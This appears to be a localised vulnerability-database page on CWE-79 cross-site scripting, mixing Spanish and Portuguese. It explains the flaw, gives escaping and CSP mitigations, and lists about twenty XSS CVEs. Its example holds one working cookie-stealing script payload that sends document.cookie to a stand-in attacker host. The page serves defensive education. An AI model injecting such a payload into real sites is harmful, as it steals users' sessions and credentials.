Fallos del tipo CWE-79

29.081 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2024-13919HIGHLaravel Reflected XSS via Route Parameter in Debug-Mode Error PageEPSS 0.5%CVE-2024-3517MEDIUMShortcodes and extra features for Phlox theme <= 2.15.5 - Authenticated (Contributor+) Stored Cross-Site Scripting via Accordion WidgetEPSS 0.5%CVE-2024-0961MEDIUMSiteOrigin Widgets Bundle <= 1.58.1 - Authenticated (Contributor+) Stored Cross-Site ScriptingEPSS 0.5%CVE-2023-7171LOWNovel-Plus Friendly Link FriendLinkController.java cross site scriptingEPSS 0.5%CVE-2024-1498MEDIUMHappy Addons for Elementor <= 3.10.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via Photo Stack WidgetEPSS 0.5%CVE-2014-125092LOWMaxButtons Plugin maxbuttons-button.php maxbuttons_strip_px cross site scriptingEPSS 0.5%CVE-2024-23192MEDIUMRSS feeds that contain malicious data- attributes could be abused to inject script code to a users browser session when reading compromised EPSS 0.5%CVE-2025-59978CRITICALJunos Space: Stored cross-site scripting vulnerability in web applicationEPSS 0.5%CVE-2024-23189MEDIUMEmbedded content references at tasks could be used to temporarily execute script code in the context of the users browser session. To exploiEPSS 0.5%CVE-2024-1070MEDIUMSiteOrigin Widgets Bundle <= 1.58.2 - Authenticated (Contributor+) Stored Cross-Site ScriptingEPSS 0.5%CVE-2024-1999MEDIUMGutenberg Blocks by Kadence Blocks – Page Builder Features <= 3.2.25 - Authenticated (Contributor+) Stored Cross-Site Scripting via Testimonial WidgetEPSS 0.5%CVE-2026-3317MEDIUMReflected Cross-Site Scripting in Navigate CMS applicationEPSS 0.5%CVE-2024-8366MEDIUMcode-projects Pharmacy Management System Update My Profile Page index.php cross site scriptingEPSS 0.5%CVE-2021-23283MEDIUMSecurity issues in Eaton Intelligent Power Protector (IPP)EPSS 0.5%CVE-2024-11304MEDIUMMultiple Stored Cross-Site ScriptingEPSS 0.5%CVE-2023-31045MEDIUMA stored Cross-site scripting (XSS) issue in Text Editors and Formats in Backdrop CMS before 1.24.2 allows remote attackers to inject arbitrEPSS 0.5%CVE-2024-3199MEDIUMThe Plus Addons for Elementor <= 5.4.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via Countdown WidgetEPSS 0.5%CVE-2023-27474HIGHHTML Injection in Password Reset email to custom Reset URL in directusEPSS 0.5%CVE-2018-25064LOWOSM Lab show-me-the-way site.js cross site scriptingEPSS 0.5%CVE-2018-25073LOWNewcomer1989 TSN-Ranksystem bot.php getlog cross site scriptingEPSS 0.5%